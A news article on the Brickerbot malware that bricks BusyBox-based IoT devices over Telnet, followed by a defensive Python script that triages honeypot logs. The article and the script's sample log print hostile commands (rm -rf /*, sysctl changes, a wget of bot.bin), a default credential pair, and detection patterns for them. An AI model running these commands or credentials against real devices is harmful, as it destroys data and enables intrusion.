A new form of attack code has come to town and it uses techniques similar to Mirai to permanently scramble Internet of Things devices.
On March 20, researchers at security shop Radware spotted the malware, dubbed Brickerbot, cropping up in honeypots it sets up across the web to lure interesting samples. In the space of four days, one honeypot logged 1,895 infection attempts by Brickerbot, with the majority of attacks coming from Argentina, and a second logged 333 attempts – untraceable as they came from a Tor node.
“The Bricker Bot attack used Telnet brute force – the same exploit vector used by Mirai – to breach a victim’s devices,” Radware’s advisory states.
“Bricker does not try to download a binary, so Radware does not have a complete list of credentials that were used for the brute force attempt, but were able to record that the first attempted username/password pair was consistently ‘root’/‘vizxv.’”
The malware targets Linux-based IoT devices running the BusyBox toolkit, and seems to have a particular affinity for Ubiquiti network devices, which have their own security issues. Once inside the operating system, the code starts to scramble the onboard memory using rm -rf /*, disables TCP timestamps, and limits the maximum number of kernel threads to one.
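An added example, not from the article or Radware's advisory: triage of Telnet honeypot sessions for the behaviour described above. The log format and sample lines are constructed, and matching on the Linux sysctl keys net.ipv4.tcp_timestamps and kernel.threads-max is an assumption about how the timestamp and thread-limit changes show up in a command log.

```python
import re
from collections import defaultdict

# Constructed honeypot log (format is an assumption): "<session> <LOGIN|CMD> <data>"
SAMPLE_LOG = """\
s1 LOGIN root/vizxv
s1 LOGIN root/admin
s1 CMD sysctl -w net.ipv4.tcp_timestamps=0
s1 CMD sysctl -w kernel.threads-max=1
s1 CMD rm -rf /*
s2 LOGIN admin/admin
s2 CMD wget http://example.invalid/bot.bin
s3 LOGIN root/vizxv
s3 CMD uname -a
"""

FIRST_CRED = "root/vizxv"  # first username/password pair Radware recorded
DESTRUCTIVE = {  # the three post-login actions the article lists
    "wipe_root": re.compile(r"\brm\s+-(?:rf|fr)\s+/\*"),
    "tcp_timestamps_off": re.compile(r"net\.ipv4\.tcp_timestamps\s*=\s*0\b"),
    "threads_max_one": re.compile(r"kernel\.threads-max\s*=\s*1\b"),
}
DOWNLOAD = re.compile(r"\b(?:wget|curl|tftp)\b")  # Bricker fetches no binary

def parse(log):
    """Group LOGIN and CMD events by session id, skipping malformed lines."""
    sessions = defaultdict(lambda: {"LOGIN": [], "CMD": []})
    for line in log.splitlines():
        parts = line.split(None, 2)
        if len(parts) == 3 and parts[1] in ("LOGIN", "CMD"):
            sessions[parts[0]][parts[1]].append(parts[2])
    return sessions

def classify(session):
    """Return (verdict, sorted names of destructive patterns seen)."""
    cmds = session["CMD"]
    hits = sorted(n for n, rx in DESTRUCTIVE.items() if any(rx.search(c) for c in cmds))
    first_cred = session["LOGIN"][:1] == [FIRST_CRED]
    downloads = any(DOWNLOAD.search(c) for c in cmds)
    if first_cred and hits and not downloads:
        return "brickerbot-like", hits
    if hits:
        return "destructive", hits
    return ("credential-match-only" if first_cred else "other"), hits

def triage(log):
    return {sid: classify(s) for sid, s in parse(log).items()}

if __name__ == "__main__":
    for sid, (verdict, hits) in triage(SAMPLE_LOG).items():
        print(sid, verdict, hits)
```

A session that opens with the known first credential but issues none of the destructive commands is reported separately, since Mirai-style scanners use the same Telnet brute-force vector.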